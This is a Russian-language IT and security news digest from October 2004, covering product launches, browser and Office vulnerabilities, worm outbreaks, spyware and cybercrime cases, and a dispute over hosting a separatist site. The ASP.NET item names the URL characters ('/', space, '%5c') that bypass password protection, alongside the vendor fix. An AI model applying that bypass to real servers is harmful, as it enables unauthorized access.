12/10/2004 11:19 Silicon Graphics принимает эстафету у HP
В компании Silicon Graphics решили возобновить производство рабочих станций для решения задач визуализации данных - построения карт нефтяных месторождений, моделирования столкновений, медицинских исследований. Системы линейки SGI Prism выполнены на процессоре Intel Itanium 2 и работают под управлением Linux. Как и в рабочих станциях Onyx, ранее предлагавшихся SGI для тех же нужд, в новых моделях применяются графические ускорители производства ATI и технология совместно используемой памяти NUMAflex. В системы устанавливается от двух до 512 процессоров, а также до 16 графических адаптеров. Стоит такая рабочая станция в минимальной комплектации примерно на треть дешевле, чем сопоставимая по конфигурации из семейства Onyx. Своим клиентам в SGI советуют воспользоваться системой виртуализации разработки компании Transitive, которая дает возможность исполнять на Prism некоторые приложения для ОС Irix. Совсем недавно в Hewlett-Packard решили отказаться от выпуска рабочих станций на основе Itanium 2. Как заявляют в SGI, если для HP 5 тыс. проданных систем в год - это причина уйти с рынка, то для Silicon Graphics та же цифра - наоборот, повод начать его осваива
"Открытые системы"

12/10/2004 10:55 Очередная уязвимость в браузере Microsoft Internet Explorer
В браузере Microsoft Internet Explorer найдена очередная уязвимость. Как отмечается в бюллетене безопасности компании GreyMagic Software, дыра позволяет атакующему получить доступ к конфиденциальным XML-документам, хранящимся на удаленном компьютере. Брешь присутствует в пакетах Internet Explorer версий 5.01, 5.5 и 6.0. Примечательно, что о существовании проблемы было известно еще в 2002 году, и корпорация Microsoft даже выпустила соответствующий патч для своего браузера. Тем не менее, по информации GreyMagic Software, дыра до сих пор представляет потенциальную угрозу для пользователей IE. О наличии старой уязвимости сообщил известный исследователь компьютерной безопасности Georgi Guninski, настранице которого приводится также пример эксплоита. В качестве меры противодействия рекомендуется отключить поддержку Active Scripting.
Описание

12/10/2004 10:28 Новое событие в программировании?
Отпрыск Калифорнийского технологического института считает, что инженерам-программистам — уже заваленным инструментами разработки — не хватает еще одного языка программирования. На прошлой неделе компания iSpheres выпустила специальный язык для управления «событиями», такими как финансовые транзакции или попытки проникновения в сеть, за которыми должны следить корпоративные программы. К концу месяца компания планирует опубликовать первую версию своего ПО EPL (Event Programming Language), которое другие смогут использовать беспошлинно. iSpheres надеется делать деньги на серверной версии ПО, которая выйдет к концу года. А чтобы повысить популярность EPL, компания предложит свой язык для утверждения в качестве отраслевого стандарта. «Управляемые событиями» приложения приобретают все более важное значение, так как предприятия ищут способ ускорить процесс принятия решений, опираясь на регулярно обновляемую информацию, говорит аналитик Gartner Рой Шульте. Он отмечает, что предыдущие исследовательские проекты уже принимались за эту область, и что другие производители, включая IBM, предпринимают собственные усилия в этом направлении. «Можно с уверенностью сказать, что это следующий герой дня, — говорит Шульте. — Основанные на событиях приложения позволяют руководителям получать свежайшую и самую полную информацию о том, что происходит в компании».
Подробнее о проекте

12/10/2004 09:50 Конференция "Проблема спама и её решения"
20-21 октября в Москве состоится Вторая национальная конференция "Проблема спама и её решения", которая посвящена всем аспектам борьбы со спамом. С докладами выступят представители крупных интернет- и сервис-провайдеров, ведущих разработчиков средств борьбы со спамом, юристы. Конференция будет полезна для лиц, принимающих решения, руководителей государственных органов, технических директоров компаний, системных администраторов, маркетологов, профессиональных юристов. Организаторы конференции - Национальная коалиция против спама и компания "Ашманов и Партнёры". Участие в качестве слушателя стоит 4900 рублей. Для некоторых категорий слушателей предоставляются скидки.
Условия участия

12/10/2004 09:38 Американские дистрибьюторы ощутили на себе политическое давление
Федеральная комиссия США по торговле (FTC) инициировала судебное дело против лиц, подозреваемых в распространении шпионского программного обеспечения с целью увеличения продаж собственных программ. Подозреваемыми оказались американец Сэнфорд Уоллас (Sanford Wallace) и две его компании: Seismic Entertainment Productions и Smartbot.net. Возбуждение дела стало возможным благодаря тому, что недавно американские конгрессмены приняли специальный закон об ограничении распространения шпионских программ (Spy Act), отмечает сайт News.com. Сам Уоллас никак не прокомментировал выдвинутые против него обвинения. Однако на одном из его сайтов появилось заявление о политической подоплеке дела. Представители FTC полагают, что Seismic и Smartbot распространяли антишпионские программы от имени других лиц с декабря 2003 года. Для реализации своих целей дистрибьюторы воспользовались уязвимостью в браузере Internet Explorer. С помощью специальной шпионской программы они направляли пользователей на сайты, предлагающие антишпионское программное обеспечение. В FTC считают, что дистрибьюторы не только перенаправляли пользователей на свои сайты, но и вынуждали их скачивать другие программы. Например, Favoriteman, TrojanDownloader, Clearsearch, WinFetcher, 7Search и VX2. Следователи из FTC утверждают, что дистрибьюторы закачивали софт на компьютеры пользователи, блокируя предупреждающие функции браузера. Таким образом пользователи даже не знали о том, что они что-либо скачивают.
Viruslist

12/10/2004 09:25 Российский МИД потребовал от Финляндии закрыть "Кавказ-центр"
МИД России сделал официальное представление Финляндии по поводу предоставления в этой стране хостинга интернет-сайту чеченских сепаратистов "Кавказ-центр", передает РИА "Новости". По данным агентства, финские власти пока никак не комментируют ситуацию. Между тем, руководитель пресс-центра Департамента информации и культуры МИДа Финляндии сообщила корреспонденту Ленты.Ру, что сайт "Кавказ-центр" уже закрыт, однако власти страны к этому никакого отношения не имеют. Кроме того, она заявила, что от российской стороны МИД обращений не получал. В течение последних суток сайт "Кавказ-центр", размещенный по адресу kavkazcenter.com, по неизвестным причинам недоступен (кстати, он выдавал информацию об исчерпании квоты (выделенного дискового пространства) в одном из PHP-скриптов). Тем временем, глава пресс-центра финской телекоммуникационной компании TeliaSonera Finland Oyj Юрки Карасвирта (Jyrki Karasvirta) заявил, что после проведенного специального расследования, выяснилось, что сайт "Кавказ-центр" разместился на сервере одного из клиентов компании, которому она предоставляет каналы связи. Представитель TeliaSonera отказался сообщить название компании, однако уточнил, что она находится на территории Финляндии. По его словам, возможность отключения ее от предоставленных каналов рассматривалась совместно с полицией, но конкретных указаний от правоохранительных органов не последовало, так как сервер обслуживает множество других пользователей, которые пострадают в случае отключения связи.
РИА "Новости"

11/10/2004 21:31 Учебно-практический курс "Ethical Hacking Hands-On"
26-27 октября 2004 г. cостоятся занятия по учебно-практическому курсу ""Ethical Hacking Hands-On". Курс проводится в учебном центре NTC (Москва). В качестве целей курса объявлены: получение ответа на вопрос "как хакеры это делают?"; получение новых знаний и умений, с овладением навыков "взломщиков" и получение иной точки зрения на традиционные аспекты ИБ; поэтапное освоение нескольких техник компьютерного взлома в среде Windows и Linux, с использованием эксплойтов для выполнения поставленных учебных задач. Стоимость курса составляет 550 "американских рублей".
О курсе

11/10/2004 21:17 "Война браузеров" может вспыхнуть вновь
Пионер «браузеростроения» и основатель Netscape Марк Андриссен (Marc Andreessen) предупреждает, что война браузеров может вспыхнуть вновь. На этот раз побороться с Microsoft Explorer предстоит новичкам - таким, как браузер Safari от компании Apple и браузер с открытым кодом Firefox. «Может статься, что быстрый удар нанесут Firefox и Safari, - заявил г-н Андриссен на конференции Web 2.0, проходившей на прошлой неделе. - Microsoft, без сомнения, придется соответствующим образом отреагировать на действия конкурентов». Firefox многим обязан Netscape. Именно Netscape Communications Corporation создала и финансировала проект по развитию ПО с открытым кодом Mozilla, в рамках которого был разработан Firefox. Позднее, правда, Mozilla обрела независимость. Утверждая, что развитие браузеров после 1998 года, когда завершилась предыдущая война между Internet Explorer и Netscape, вступило в полосу застоя, г-н Андриссен заявляет, что появление в последнее время новых программных продуктов, способных успешно конкурировать с детищами Microsoft, заставит софтверного гиганта обратить большее внимание на развитие новых функциональных возможностей в своем браузере Internet Explorer. Тем не менее, предупреждает он, конкуренция может вынудить Microsoft прибегнуть к агрессивной тактике в целях предохранения монопольного положения, которое все еще занимает Windows. Ранее специфические методы, которые использовал Microsoft в борьбе с Netscape, привели к тому, что в отношении Microsoft антимонопольный комитет США возбудил длительное расследование.
CNews

11/10/2004 20:34 Ряды интернет-вымогателей становятся все шире
Как минимум шесть-семь тысяч интернет-компаний регулярно выплачивают "дань" сетевым вымогателям и эпидемия кибер-вымогательства продолжает захватывать мир. Выступая на презентации доклада "20 крупнейших уязвимостей интернета SANS Institute", директор по исследовательской работе этой организации Алан Паллер (Alan Paller) заявил, что проблема интернет-рэкета с каждым годом становится все острее. По его словам, на крючках вымогателей сидят практически все интернет-казино и многие другие компании, бизнес которых напрямую зависит от бесперебойной работы их веб-серверов. Роль утюга, используемого сетевыми бандитами, по-прежнему выполняют DDoS-атаки, способные надолго вывести из строя сайт "клиента" и, таким образом, оставить его без посетителей и их денег. Интернет-компании, желающей избавиться от такой участи, обычно предлагают заплатить некоторую сумму отступных, чтобы какое-то время чувствовать себя в безопасности. К сожалению, у экспертов по компьютерной безопасности пока нет эффективных инструментов для борьбы с сетевыми вымогателями. Тем более что, также как и в реальном мире, большинство жертв рэкета старается не информировать полицейские структуры о факте вымогательства, опасаясь потерять лицо и разозлить вымогателей.
Internet.Ru

11/10/2004 20:08 Движок Mozilla уже переносят на Qt
Начали появляться первые результаты работы по переносу движка Mozilla на платформу Qt. На данный момент работа только началась, но попробовать скомпилировать Mozilla для Qt уже можно - достаточно скачать исходные коды из репозитория CVS и собрать их с опцией "enable-default-toolkit=qt". Разработчики говорят, что на данном этапе ни пожелания, ни отчеты о найденых ошибках приниматься не будут, если к ним не будет приложен код, исправляющий положение. Об этом рассказал в своём блоге один из разработчиков Zack Rusin.
Подробности

11/10/2004 11:28 Биометрическая аутентификация в мобильниках: $5 уже в следующем году
Тенденция удешевления биометрических датчиков, позволяющих определить пользователя по отпечатку пальца, ведет к тому, что уже в следующем году, по мнению тайваньских индустриальных наблюдателей, применение таких систем в мобильных телефонах может стать рядовым явлением. Так, по некоторым данным, средние цены на биометрические датчики линейного типа в следующем году снизятся ниже психологической отметки $5, что, возможно, приведет к значительному росту числа моделей мобильных телефонов с такими датчиками. Сейчас цены на эти сенсоры колеблются на уровне $6-7 и главным образом, применяются в датчиках доступа дверных замков. Тенденция удешевления и снижения габаритов таких датчиков ведет к тому, что уже в ближайшее время они смогут на равных конкурировать с датчиками объемного типа.
Mobile-Review

11/10/2004 10:53 Очередная версия червя Bagle
"Лаборатория Касперского" сообщает о появлении новой модификации червя Bagle. Червь Bagle.AS распространяется по электронной почте в виде вложений с различными именами, а также через пиринговые сети, маскируясь под полезные утилиты и приложения, например, ACDSee 9.exe или WinAmp 5 Pro Keygen Crack Update.exe. После запуска вирус записывает себя в системный каталог Windows, регистрируется в реестре и создает копии вредоносного кода во всех папках, содержащих в названии символы "share". Кроме того, червь открывает ТСР и UDP порт 81 для получения команд от авторов.
Описание

11/10/2004 10:41 Via разрабатывает 64-разрядное ядро
В 2006 году в компании Via Technologies планируют выпустить процессорное ядро Isaiah, которое кроме стандартного набора команд x86 будет поддерживать 64-разрядные расширения, разработанные AMD. Сейчас около половины своих процессоров Via продает сборщикам ПК, остальное поставляется для встраивания в различное оборудование. В компании рассчитывают, что и Isaiah привлечет внимание в обоих этих сегментах. Выпускать двухъядерные процессоры в Via пока не планируют, поскольку ориентируются на ОЕМ-партнеров, в большей степени заинтересованных в недорогих чипах с низким энергопотреблением энергии, чем в высокой производительности. Тем не менее при разработке модуля вычислений с плавающей запятой Isaiah основное внимание уделялось именно производительности, которая, как заявляют в Via, будет "на несколько порядков" более высокой, чем у предыдуших процессоров компании. За счет этого в Via надеются завоевать клиентуру из числа производителей потребительской мультимедиа-электроники и видеоприставок. Особенностью Isaiah также будет одновременное наличие встроенного контроллера памяти и поддержки возможности обмена данными с внешним контроллером посредством системной шины.
"Открытые системы"

11/10/2004 10:22 Spyware в Opera
Не зарегистрированная Opera отправялет на специальный адрес одного из серверов google полную информацию содержащую любой запрос который выполнил броузер, после чего googlebot моментально приватно индексирует данный запрашиваемый вами ресурс. Пока имеются подтвержденные данные только об релизах Операх 7.54 и 7.50. Сам механизм, по которому ссылки и ваш IP передаются в Google является официально используемой самой Google (и более чем уверен надежно запатентованой) технологией, суть которой заключается в том, что на основании контента страничек по которым ходит пользователь и его же IP-адреса, по которому приблизительно можно вычичлить в какой стране он находится, на основании этих данных Google выбирает ему баннер с более подходящей для этого пользователя тематикой и языком. Spyware обнаружен sergom. На основании дискуссии, разгоревшейся в linux.org.ru автором были внесены некоторые изменения в отчёт, ссылка на который представлена ниже.
Отчёт

11/10/2004 09:56 Siemens поддержала новую технологию беспроводной связи
Германский производитель телекоммуникационного оборудования внедряет технологию широкополосной беспроводной сети нового типа, конкурирующую с Wi-Fi и сотовыми сетями 3G. В пятницу компания анонсировала соглашение с Flarion Technologies о разработке продуктов инфраструктуры беспроводной сети, использующей сотовую технологию Flash-OFDM (Orthogonal Frequency Division Multiplexing). По условиям этого соглашения Flarion разработает базовое оборудование, отвечающее спецификациям продуктов Siemens. Siemens планирует начать продажу аппаратуры Flash-OFDM ко второму кварталу 2005 года. Несколько сервис-провайдеров сотовой телефонии уже проводят испытания технологии Flarion, в том числе Vodafone, Nextel Communications и T-Mobile. Nextel с апреля предлагает коммерческие услуги с применением этой технологии в Северной Каролине. OFDM передает множество сигналов одновременно по одному каналу — кабельному или беспроводному. Данные распределяются по большому числу смежных фиксированных несущих. Flarion разработала собственную версию OFDM, Flash-OFDM, в которой используется множество тонов для быстрого перескакивания между частотами с целью распределения сигналов по заданному частотному спектру. Технология Flash-OFDM привлекательна тем, что она предлагает относительно высокие скорости передачи данных (1,5 Мбит/с) по нелицензируемым и неиспользуемым частотам. Сотовые провайдеры CDMA могут обеспечить скорость передачи данных всего 300-500 Кбит/с. Однако скорость передачи данных Wi-Fi все же выше, чем у Flash-OFDM. Службы, использующие спецификацию 802.11b, могут передавать данные со скоростью 11 Мбит/с, а спецификация 802.11g повышает ее до 54 Мбит/с. Проект стандарта W-Fi следующего поколения 802.11n обещает скорости передачи данных до 100 Мбит/с. В отличие от Wi-Fi, технология Flash-OFDM позволяет мобильным пользователям беспроводной сети поддерживать связь даже при передвижении с большой скоростью, например, в поезде.
Описание OFDM

10/10/2004 14:36 Арестован китайский хакер, похитивший 93 тыс. долларов США
В Китае арестован хакер, ограбивший один из крупнейших банков страны через Интернет. Об этом сообщает сегодня газета "Чайна дейли". Компьютерным взломщиком, за которым полиция охотилась восемь месяцев, оказался 23-летний студент из Харбина Сун Чэнлинь. Он обвиняется в похищении из Промышленно-торгового банка Китая 770 тыс. юаней /93 тыс.долларов США/. В начале года компьютерный гений открыл в банке счет по поддельному удостоверению, а затем, сидя в интернет-кафе в Харбине, проник в банковскую информационную сеть и взломал счета 158 клиентов. В преступной операции ему помогали три сокурсника, которых удалось быстро вычислить. Суд приговорил их к тюремным срокам от 10 до 13 лет. Главного исполнителя удалось поймать спустя лишь 8 месяцев в городе Гуйян - административном центре южной провинции Гуйчжоу. Суд над ним еще впереди.
Crime-Research.Ru

10/10/2004 14:04 Массовые обыски Управления "К" в Волгограде
7 октября в г. Волгоград сотрудниками Управления “К” была проведена спецоперация, в результате которой были проведены обыски у 40 человек. Обвиняемые, среди которых есть девушки, обвиняются по двум статьям Уголовного кодекса РФ: 272 - "Неправомерный доступ к компьютерной информации" и 273 - "Создание, распространение и использование вредоносных программ для ЭВМ". Как сообщил один из потерпевших большинство подозреваемых молодые люди в возрасте от 14 до 20 лет. На компьютерах некоторых овиняемых будут обнаружены вредоносные программы, такие как KaHt II, что скорее всего будет основным в доказательстве преступления. На большинстве компьютеров не будет обнаружено ни одной вредоносной программы или наличие модемного соединения. У некоторых отсутствовали жесткие диски (на днях до изъятия они сгорели у двух потерпевших). Многие из обвиняемых не подозревали о том, что они выходят в Интернет по краденым паролям, так как получили эти данные от своих друзей и знакомых. Все обвиняемые выходили в Интернет за счет волгоградского провайдера "AVTLG.RU". Предполагается, что экспертиза изъятых компьютеров продлится не один месяц.
SecurityLab

10/10/2004 13:44 Microsoft латает уязвимость в ASP.NET
В начале этой недели Microsoft объявила о том, что исследует уязвимость в ASP.NET, позволяющую посетителям обходить запрос пароля при обращении к страницам с ограниченным доступом, связанную с приведением URL к каноническому виду - оказалось возможным использование в URL вместо символа обратного слеша ('\') символов прямого слеша ('/'), пробела и "%5c". В качестве средства устранения проблемы сперва было предложено добавить в файл Global.asax обоработчик события Application_BeginRequest, выполняющий проверку путей на наличие запрещенных символы. Чуть позже администраторам IIS было предложено скачать и установить модуль ValidatePath, решающий ту же задачу. Классический ASP не подвержен данной уязвимости.
Описание

10/10/2004 13:12 Офисные документы получат единый стандарт
Евросоюз поддерживает Sun Microsystems в намерении утвердить единый международный формат офисных документов, одобренный Международной организацией по стандартизации (ISO). В своем письме президент Sun Джонатан Шварц заявляет о своем согласии с рекомендацией подразделения Еврокомиссии по обмену данными между администрациями (IDA), которая еще в мае предложила принять в качестве международного стандарта офисных документов формат, используемый в свободно распространяемом офисном пакете OpenOffice.org.
Подробности

10/10/2004 12:58 Финский провайдер не нашел причин для закрытия "Кавказ-центра"
Компания TeliaSonera, являющаяся крупнейшим оператором связи Северной Европы, подтвердила в субботу, что предоставляет сайту "Кавказ-центр" хостинг в Финляндии, сообщает Reuters. По словам представителя компании Юрки Карасвирта (Jyrki Karasvirta), TeliaSonera не нашла причин для закрытия сайта. "Наши юристы и полиция проверяли сайт последние 24 часа и не обнаружили каких-либо материалов, позволяющих его закрыть", - заявил он. Согласно финскому законодательству, сайт может быть заблокирован только в том случае, если он используется для распространения детской порнографии, а также публикации материалов расистской и фанатической направленности, отметил Карасвирта. "У нас есть соглашение с клиентом и мы не имеем юридического права закрыть сайт", - заявил представитель TeliaSonera, отказавшись назвать владельца сайта "Кавказ-центр". 7 октября "Кавказ-центр" возобновил работу под прежним адресом. При этом у доменов kavkazcenter.com и kavkaz.tv сменился IP-адрес. Судя по Whois-сервису, сервер работает в сети, принадлежащей организации Kavkaz Information Center, расположенной в Тбилиси на улице Горгасали. Однако исходя из маршрута передачи данных, сеть расположена в Финляндии.
Подробности

10/10/2004 12:35 Компьютерная преступность в России стала в полтора раза более наказуемой
Число уголовных дел, возбужденных Управлением МВД по борьбе с преступлениями в сфере информационных технологий, выросло в нынешнем году на 45 процентов. В первом полугодии 2004 года возбуждено 1673 уголовных дела. Об этом сообщил в старший оперуполномоченный Управления "К" ГУСТМ МВД России Антон Кузнецов, выступая с докладом на VI международной конференции "Право и Интернет", завершившейся в Москве в пятницу вечером. Как следует из доклада, прирост в первую очередь коснулся числа возбужденных уголовных дел, а не выявленных преступлений, количество которых увеличилось всего на 6 процентов. В общей сложности в 2003 году силами МВД выявлено 10920 компьютерных преступлений, в первом полугодии этого - 4295.
Lenta.Ru

9/10/2004 23:04 Critical Update for Windows XP (KB885523)
В Центре загрузки Microsoft появилось критическое обновление для Windows XP, cообщает SecurityLab.ru. Этот патч предназначен для решения проблемы безопасной установки программ производства "не Microsoft". Обновление рекомендуется установить всем пользователям операционной системы Windows XP, чтобы решить проблему безопасной установки новых программ в будущем. Патч с номером KB885523 предназначен для установки на следующие операционные системы: Windows XP, Windows XP Home Edition, Windows XP Media Center Edition, Windows XP Professional Edition, Windows XP Service Pack 1, Windows XP Service Pack 2.
Русская версия
Английская версия

9/10/2004 22:34 Настройка почтового сервера на базе qmail под FreeBSD
Дмитрий Лутай из Украины опубликовал статью "Настройка почтового сервера на базе qmail под FreeBSD". Описан процесс установки и настройки почтового сервера, основу которого составляют Qmail и Courier-IMAP. Для управления почтовыми доменами через web-интерфейс используется Qmailadmin, в качестве удобного и мощного пакета веб-почты выбран пакет SquirrelMail (на PHP).
Cтатья

9/10/2004 17:02 Cabir заражает мобильные телефоны в Сингапуре
Сингапурские пользователи мобильных телефонов подверглись нападению червя, который распространяется через Bluetooth, используя операционную систему Symbian. Впервые Worm.SymbOS.Cabir.a был обнаружен в июне: международная группа вирусописателей 29А выслала антивирусным компаниям тогда еще не выпущенный "на волю" образец Cabir'а. На сегодняшний день червь не представляет серьезной угрозы пользователям мобильных телефонов. Его главный вредоносный эффект - расход заряда аккумуляторов из-за постоянного поиска находящихся поблизости активных Bluetooth-устройств. "Все это лишь доказывает существование вируса на данном этапе, хотя некоторые люди жалуются на потери файлов во время пользования интернетом. Будущие варианты вируса, возможно, станут большей угрозой, но на сегодня он не представляет особенной опасности", - говорит Микко Хиппонен, директор антивирусных исследований компании F-Secure.
Viruslist

9/10/2004 16:11 Выход SuSE 9.2
Вышла новая версия дистрибутива SuSE Linux 9.2. Дистрибутив основан на ядре 2.6.8, xorg 6.8.1 и KDE 3.3 и GNOME 2.6. Рекомендованная розничная цена 89.95 евро. Дистрибутив должен поступить в продажу в ноябре.
Подробности

9/10/2004 15:49 "Диасофт" модернизировала 5NT(e) Client
В рамках стратегии развития продуктов и услуг в области дистанционного обслуживания для новых клиентов, компания "Диасофт" совместно с чешским разработчиком BSC Praha выпустила систему Diasoft Gemini. При этом для текущих клиентов "Диасофт" продолжает обслуживать решение 5NT(e) Client. Как утверждают в "Диасофт", специалисты компании не только в прежнем режиме выполняют все необходимые работы по сопровождению системы 5NT(e) Client, но и разрабатывают новую функциональность, регламентированную требованиями Банка России. Так, в новой версии 5NT(e) Client в клиентской части подсистемы тип документов "Поручение на обязательную продажу валюты" преобразован в "Распоряжение на продажу валютной выручки", а также добавлен новый тип документа - "Уведомление о поступлении средств на транзитный счет". Кроме того, поддержана возможность составления справки о валютных операциях, а в связи с тем, что покупка иностранной валюты утратила целевой характер, форма "Поручения на покупку иностранной валюты" стала более компактной. По словам руководителей "Диасофт", у клиентов не будет ограничений по докупкам дополнительных рабочих мест системы 5NT(e) Client или по расширению числа каналов взаимодействия клиентов с банками, поддерживаемых в этой системе, но если пользователи 5NT(e) Client, заинтересуются решением Diasoft Gemini, вопрос о замене системы легко решаем.
"Открытые системы"

9/10/2004 15:27 Найдена ошибка в старых версиях Microsoft Office
Secunia опубликовала предупреждение, согласно которому в Office 2000 (а возможно, и в Office XP) присутствует ошибка переполнения буфера, которая позволяет хакерам получить контроль над системой пользователя. Компания квалифицирует баг как «в высшей степени критический». Secunia утверждает, что уязвимость вызвана ошибкой в способе управления входными данными в Microsoft Word при анализе файлов документов. Ее можно использовать, подготовив специальный документ, так что пользователям рекомендуется до устранения ошибки открывать только надежные документы Word. В Microsoft сказали, что проблема изучается, но пеняют первооткрывателю бага — которого Secunia называет просто HexView — за то, что тот не предупредил Microsoft, прежде чем обнародовать эту информацию. «На данный момент нам не известно ни о каких активных эксплойтах для указанной уязвимости или о пострадавших заказчиках, но мы активно изучаем поступающие сообщения», — пишет в e-mail представитель Microsoft. Однако компания сожалеет о том, что ее не поставили в известность о найденной ошибке заранее. «Microsoft обеспокоена тем, что это новое сообщение об уязвимости в Word было обнародовано без должной ответственности, что подвергает пользователей компьютеров риску, — пишет представитель. — Мы уверены, что общепризнанная практика сообщения об уязвимостях непосредственно поставщику наилучшим образом отвечает общим интересам, помогая гарантировать получение заказчиками высококачественных обновлений, не подвергаясь атакам злоумышленников до тех пор, пока не будет разработан патч». Некоторые специалисты по безопасности обвиняют Microsoft в медлительности при подготовке исправлений. Microsoft говорит, что по завершении расследования она примет решение о том, нужно ли что-либо предпринимать и если нужно, то что именно. Возможные варианты: выпуск исправления в рамках регулярных ежемесячных патчей или внеплановый выпуск поправки, если уязвимость того требует.
Описание

9/10/2004 14:24 Microsoft представит Windows Media Center Edition 2005
На следующей неделе в Лос-Анджелесе корпорация Microsoft представит новую операционную систему Windows Media Center Edition 2005, предназначенную для домашних "развлекательных" компьютеров (Media Center PC), сообщает Associated Press. Windows Media Center Edition 2005 принадлежит к семейству Windows XP и отличается расширенными мультимедийными возможностями. По замыслу разработчиков, специальный компьютер, оснащенный такой операционной системой, должен стать центром домашних развлечений. С единого пульта дистанционного управления можно будет управлять не только самим компьютером, но и всей аудио-видео техникой, подключенной к нему. В том числе, записывать телепрограммы в высоком качестве на DVD или жесткий диск, просматривать файлы с фотографиями и видео на экране телевизора, а также выходить в Интернет. По заверению разработчиков, новая версия линейки Media Center, впервые представленной в 2002 году, избавится от множества неудобств ранних версий. Необходимость в клавиатуре практически отпадет. Microsoft надеется, что с удешевлением оборудования для нового продукта он станет массовым. Одновременно с этой презентацией в Нью-Йорке корпорация Intel представила прототипы тех самых "развлекательных" компьютеров, для которых эта операционная система и предназначена. Компактный высокопроизводительный компьютер на базе Pentium-4, совмещенный с телевизионным экраном и DVD-рекодером, появится на рынке в 2005 году.
Подробнее

8/10/2004 11:25 "Кавказ-центр" переехал из Литвы в "Грузию" и снова заработал
Сайт чеченских сепаратистов "Кавказ-центр" возобновил свою работу под прежним адресом в четверг - спустя три недели после того, как Департамент госбезопасности Литвы временно его заблокировал. При этом у доменов kavkazcenter.com и kavkaz.tv сменился IP-адрес. Судя по Whois-сервису, сервер 213.28.254.60 расположен в сети, принадлежащей организации Kavkaz Information Center, расположенной в Тбилиси на улице Горгасали. Однако реальное расположение сервера может и не совпадать с указанным. В данном случае специалисты не исключают фальсификации учетных данных: вышеупомянутая сеть подключена к Интернету через финского провайдера Sonera. При этом задержка передачи данных между финским и "грузинским" серверами настолько мала, что предполагает наличие локального подключения. Ранее хостинг предоставлялся "Кавказ-центру" литовской компанией ELNETA. Российский МИД неоднократно пытался уговорить литовские власти закрыть сайт. Изначально Литва отказывалась блокировать работу "Кавказ-центра" без соответствующего решения суда. Однако после того, как на сайте была объявлена награда в 20 миллионов долларов за помощь в поимке президента РФ Владимира Путина, Департамент госбезопасности Литвы принял решение закрыть доступ к сайту, не дожидаясь судебного решения.
lenta.ru

7/10/2004 11:19 Федеральный удостоверяющий центр ЭЦП появится до конца года
По словам Владимира Матюхина (на фото), руководителя Федерального агентства по информатизации (ФАИТ) РФ, федеральный или "корневой" удостоверяющий центр ЭЦП будет сформирован уже до конца текущего года, после чего начнется создание подобных центров в регионах и объединение их в единую информационную инфраструктуру. Именно ФАИТ является полномочным органом, отвечающим за создание удостоверяющих центров. Запуск системы удостоверяющих центров в структуре государственной информационной системы г-н Матюхин назвал одним из основных направлений работы агентства по реализации одобренной правительством РФ "Концепции использования информационных технологий в деятельности федеральных органов государственной власти до 2010 г.". "Обмен электронными документами без удостоверения их юридической значимости, без действующего механизма применения электронной цифровой подписи сегодня невозможен", - отметил в рамках пресс-брифинга руководитель Федерального агентства по информатизации (ФАИТ) РФ Владимир Матюхин. "Таким образом, проблема применения ЭЦП в нашей стране будет, наконец, решена, - считает г-н Матюхин. - И это касается не только технических средств заверения подлинности документа, но и вопросов правовой защиты участников обмена электронными документами, что крайне важно". В числе других важных задач, которыми намерено заниматься ФАИТ, г-н Матюхин назвал формирование в стране общей информационной инфраструктуры, создание единых юридически значимых географических карт территории России в электронно-цифровом виде, построение защищенных хранилищ электронных баз данных различных ведомств. Кроме того, большое значение, по его мнению, имеет организация централизованных закупок компьютерной техники для госструктур.
CNews

7/10/2004 11:06 Обнаружена новая модификация червя Mydoom
Symantec предупреждает о появлении очередной модификации червя Mydoom. Вариант Mydoom.AD распространяется по электронной почте в виде вложений с различными именами, через популярные файлообменные сети, а также через каналы IRC. После проникновения на компьютер-жертву вредоносная программа регистрируется в ключе автозапуска системного реестра, завершает ряд процессов, связанных со службами безопасности, и пытается запретить доступ к сайтам антивирусных компаний. Далее червь осуществляет сканирование жестких дисков в поисках адресов электронной почты, по которым затем отправляются копии вредоносного кода. При организации массовых рассылок Mydoom.AD применяет встроенный SMTP-сервер.
Описание

7/10/2004 10:49 Диверсия против GNU Public Licence?
Как сообщает The INQUIRER, в базу данных сигнатур вирусов популярного в мире открытых систем антивируса Clamav была внесена сигнатура, определяющая передаваемые по почте файл "COPYING" (обычно содержит соглашение о лицензии GPL) как вирус. Необходимо отметить, что командой разработчиков подобная сигнатура была оперативно убрана, однако факт остаётся фактом. Как известно, база сигнатур поддерживается добровольцами и, судя по всему, кем-то из них была включена подобная строка. Собственно, дистрибутивы опен-сорс довольно редко передаются по электронной почте, так что опасность не так уж и велика.
Подробности

7/10/2004 10:23 Novell: SUSE LINUX 9.2 появится в начале ноября
Вчера в Лондоне на LinuxWorld Expo 2004 компания Novell объявила о том, что операционная система SUSE LINUX Professional 9.2 появится в ноябре. Дистрибутив будет доступен как для стандартных 32-разрядных процессоров ПК, так и для AMD Athlon 64 и Intel Extended Memory 64 Technology. В новой версии появится поддержка беспроводной связи Bluetooth с автоматическим обнаружением и распознаванием Bluetooth-устройств в главной административной и конфигурационной утилите YaST. Кроме того, в YaST теперь просто подключаться к беспроводным сетям (WLAN), появилось продвинутое управление питанием через ACPI (Advanced Configuration and Power Interface) и возможность спящего режима с сохранением данных о сеансе на диск (suspend-to-disk). В дистрибутив вошло более 3500 пакетов, среди которых KDE 3.3 и GNOME 2.6 (с X Window System X11R.6.8.1), OpenOffice.org 1.1.3, Novell Evolution™ 2.0, GIMP 2, Inkscape (новое приложение для работы с векторной графикой), Nvu (система для редактирования Web-страниц с простым интерфейсом WYSIWYG), коммерческое программное обеспечение (TextMaker и PlanMaker от SoftMaker, sesam от SEP, MainActor 5 от MainConcept), GCC 3.3.4 и glibc 2.3.3, KDevelop, Eclipse и Mono.
nixp.ru

7/10/2004 10:04 Число "зомби"-машин стремительно растет
Число компьютеров, которые спамеры заразили вредоносными программами для рассылки своих сообщений, за первое полугодие 2004 года возросло в 15 раз. По данным производителя антивирусного ПО - компании Symantec, с января по июнь количество так называемых "зомби"-машин, заражаемых ежедневно, увеличилось с 2000 до 30000. Сейчас число вновь заражаемых машин может достигать 75000 в день. "Вредоносные программы создают трудности как для компаний, так и для индивидуальных пользователей. Зараженные машины автоматически загружают новые троянские программы. Таким образом, хакеры и спамеры опережают критические обновления операционных систем", - отметил представитель руководства Symantec.
Symantec

7/10/2004 09:37 Минсвязи не считает Интернет средством массовой информации
